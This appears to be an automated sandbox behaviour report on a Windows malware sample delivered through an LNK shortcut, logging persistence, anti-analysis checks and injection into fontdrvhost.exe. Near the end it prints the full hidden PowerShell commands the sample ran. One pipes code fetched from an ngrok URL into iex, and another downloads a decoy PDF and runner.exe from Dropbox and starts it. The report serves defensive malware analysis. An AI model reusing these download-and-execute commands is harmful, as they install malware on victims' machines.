                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00473991 push ecx; ret 24_2_004739A4
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043BA97 pushfd ; retf 24_2_0043BB03
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043BB04 pushfd ; iretd 24_2_0043BB09
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043BBC0 pushfd ; iretd 24_2_0043BBC1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00434CDF pushfd ; retf 24_2_0044287B
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0044BC80 pushfd ; iretd 24_2_0044BCE7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043ED50 pushfd ; retf 24_2_0043ED5C
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043ADCC pushfd ; retf 24_2_0043ADD9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00439DF3 pushfd ; ret 24_2_00439E59
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00439E72 pushfd ; iretd 24_2_00439EA1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043AF23 pushfd ; iretd 24_2_0043AF27
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00433FF1 push ss; retf 24_2_00433FF2
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00437FA3 pushfd ; iretd 24_2_00439EA1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_03006F0F push esi; ret 25_3_03006F21
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_0300296C push edi; ret 25_3_03002978

                    Persistence and Installation Behavior

                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\111392827.exe
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_004112B7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_004112B9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_004112B7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_004112B9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_0041B4B0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,22_2_0041F8D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00420B40 IsIconic,22_2_00420B40
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,24_2_0041F8D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00420B40 IsIconic,24_2_00420B40
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 56CB83A
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                    Source: 111392827.exe, 00000016.00000002.2668588837.0000000000909000.00000040.00001000.00020000.00000000.sdmp, 111392827.exe, 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000018.00000003.2641157936.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2631854093.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                    Source: 111392827.exeBinary or memory string: CFF EXPLORER.EXE
                    Source: 111392827.exe, 00000016.00000002.2668588837.0000000000909000.00000040.00001000.00020000.00000000.sdmp, 111392827.exe, 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000018.00000003.2641157936.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2631854093.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                    Source: fontdrvhost.exe, 00000019.00000002.2762783406.00000000037F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE33
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4739Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5120Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5157
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4452
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeDropped PE file which has not been started: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeAPI coverage: 1.1 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep count: 4739 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5268Thread sleep count: 5120 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 6120Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep count: 5157 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep time: -21213755684765971s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep count: 4452 > 30
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,22_2_004631F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,22_2_0045A7D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00462F00 FindFirstFileW,FindClose,22_2_00462F00
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,24_2_004631F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,24_2_0045A7D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00462F00 FindFirstFileW,FindClose,24_2_00462F00
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                    Source: fontdrvhost.exe, 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                    Source: svchost.exe, 00000006.00000002.3285634194.0000018A79457000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000002.2756628093.0000000003192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: msedge.exe, 00000005.00000003.2215359947.00003C1000340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                    Source: 111392827.exe, 00000016.00000002.2669074846.0000000002866000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000016.00000000.2449282518.0000000000599000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: WFQEMU_
                    Source: fontdrvhost.exe, 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: svchost.exe, 00000006.00000002.3281965160.0000018A73C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                    Source: msedge.exe, 00000005.00000002.2231876277.0000024149243000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2521531111.0000028B71F70000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2409487598.0000022184646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: fontdrvhost.exe, 00000019.00000002.2756628093.0000000003192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                    Source: powershell.exe, 00000002.00000002.2388717864.000001BD9C2D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeAPI call chain: ExitProcess graph end nodegraph_22-44376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_006091B0 LdrInitializeThunk,VirtualFree,24_3_006091B0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_004734E6
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,22_2_004150A0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_00609277 mov eax, dword ptr fs:[00000030h]24_3_00609277
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_03000283 mov eax, dword ptr fs:[00000030h]25_3_03000283
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00474040 GetProcessHeap,HeapFree,22_2_00474040
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_004734E6

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeMemory written: C:\Users\user\AppData\Local\Temp\111392827.exe base: 5D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00502A5F cpuid 22_2_00502A5F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
